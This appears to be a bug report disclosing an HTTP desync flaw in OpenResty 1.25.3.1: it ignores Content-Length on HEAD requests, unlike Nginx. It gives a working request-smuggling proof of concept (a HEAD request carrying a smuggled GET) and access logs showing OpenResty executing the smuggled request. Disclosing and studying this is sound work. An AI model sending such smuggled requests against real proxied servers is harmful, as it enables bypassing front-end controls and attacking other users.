OpenResty ignores content-length header for HEAD method unlike Nginx. If there is a proxy layer before OpenResty, this behavior can be used to exploit the system using HTTP Desync Attacks.
OpenResty : 1.25.3.1
Nginx : 1.25.3
Example for HEAD method -
Request
HEAD /envelope HTTP/1.1
Host: 127.0.0.1:8080
User-Agent:envelop-req
Content-Length: 66
GET /test HTTP/1.1
Host: 127.0.0.1:8080
User-Agent:smuggled-req
Nginx Access Log -
nginx_1 | 172.18.0.1 - - [28/Jan/2024:02:14:27 +0000] "HEAD /envelope HTTP/1.1" 200 0 "-" "envelop-req"
OpenResty Access Log -
openresty_1 | 172.18.0.1 - - [28/Jan/2024:02:14:34 +0000] "HEAD /envelope HTTP/1.1" 200 0 "-" "envelop-req"
openresty_1 | 172.18.0.1 - - [28/Jan/2024:02:14:34 +0000] "GET /test HTTP/1.1" 200 32 "-" "smuggled-req"
But both OpenResty and Nginx honor Content-Length header for GET requests.
Example for GET method -
Request
GET /envelope HTTP/1.1
Host: 127.0.0.1:8080
User-Agent:envelop-req
Content-Length: 66
GET /test HTTP/1.1
Host: 127.0.0.1:8080
User-Agent:smuggled-req
Nginx Access Log -
nginx_1 | 172.18.0.1 - - [28/Jan/2024:02:18:18 +0000] "GET /envelope HTTP/1.1" 200 17 "-" "envelop-req"
OpenResty Access Log -
openresty_1 | 172.18.0.1 - - [28/Jan/2024:02:17:49 +0000] "GET /envelope HTTP/1.1" 200 32 "-" "envelop-req"